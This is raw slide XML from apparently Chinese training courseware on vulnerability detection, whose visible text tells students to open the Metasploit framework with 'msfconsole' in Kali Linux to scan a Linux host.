                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>      </a:t>
              </a:r>
              <a:r>
                <a:rPr dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>本项目利用Metasploit工具对目标主机的相关服务进行漏洞检测。</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实例】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3795395" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3795395" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3129915" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具对Linux主机进行漏洞检测</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="文本框 130"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5258435" y="1502410"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.在Kali Linux终端界面中输入“msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>命令，打开Metasploit框架，如图2-4-42所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5258435" y="2147570"/>
            <a:ext cx="5276850" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="文本框 131"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5258435" y="4433570"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-42 打开Metasploit框架</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3795395" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3795395" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3129915" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具对Linux主机进行漏洞检测</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
